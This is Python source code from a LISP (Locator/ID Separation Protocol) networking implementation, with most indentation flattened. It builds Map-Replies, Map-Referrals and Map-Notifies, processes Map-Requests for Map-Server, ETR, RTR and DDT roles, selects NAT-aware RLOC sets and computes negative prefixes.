#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
if (lisp_i_am_rtr):
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
#endif
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want to return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and rtr in lisp_rtr_list or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add the output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Check the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
# This can also be true for IPv6 RLOCs. So include them.
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
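#
# Worked example (hypothetical RLOC-set): a site registers 10.0.0.1
# (private, priority 1), 128.9.0.1 (public, priority 1), and 192.0.2.1
# (RTR, priority 254). When the RTR at 192.0.2.1 sends the Map-Request,
# it gets back [10.0.0.1, 128.9.0.1] so it can encapsulate directly to
# the ETRs. Any other requester gets the private RLOC plus the RTR
# entry, [10.0.0.1, 192.0.2.1].
#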
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return(pubsub)
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested; return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
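#
# For example, per the LISP message type numbering, a Map-Reply with a
# record count of 1 starts with first-long 0x20000001; the converted
# Map-Notify starts with 0x40000001 and carries one extra zeroed
# longword (Key-ID, Alg-ID, Authentication Length 0) after the nonce.
#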
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
registered_eid, site):
for peid in lisp_pubsub_cache:
for pubsub in list(lisp_pubsub_cache[peid].values()):
e = pubsub.eid_prefix
if (e.is_more_specific(registered_eid) == False): continue
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(peid, False), nonce))
#
# Do not use memory from EID-record of Map-Register since we are
# over-writing EID for Map-Notify message.
#
pubsub_record = copy.deepcopy(eid_record)
pubsub_record.eid.copy_address(e)
pubsub_record = pubsub_record.encode() + rloc_records
lisp_build_map_notify(lisp_sockets, pubsub_record, [peid], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
pubsub.map_notify_count += 1
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in an IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. An ITR usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If the request is for a non-crypto-EID, signatures are configured
# to be required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not want to return a coarser EID-prefix to the Map-Resolver.
# The AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and site_eid.policy in lisp_policies):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the TTL should be, and whether we should drop the
# Map-Request and return a negative Map-Reply?
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# When replying to a subscribe-request, return the target EID and not
# the possibly shorter matching EID-prefix that was registered.
#
if (pubsub):
reply_eid = eid
reply_group = group
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs").format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to an ETR at the registered site. We have to put it in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from a Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# We matched the auth-prefix itself, which means there are no referrals
# below it.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
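#
# Worked sketch of the XOR idea above on raw 32-bit integers (hypothetical
# helper, not used elsewhere in this file):
#
def example_neg_mask_len(addr1, addr2, address_size=32):
    diff_address = addr1 ^ addr2
    for mask_len in range(address_size):
        if (diff_address & (1 << (address_size - mask_len - 1))):
            return(mask_len)
        #endif
    #endfor
    return(address_size)
#enddef
#
# example_neg_mask_len(0x0a000000, 0x0a000100) returns 23: 10.0.0.0 and
# 10.0.1.0 share their first 23 high-order bits and first differ at bit 23
# (0-indexed from the left).
#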
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix that
# is no shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
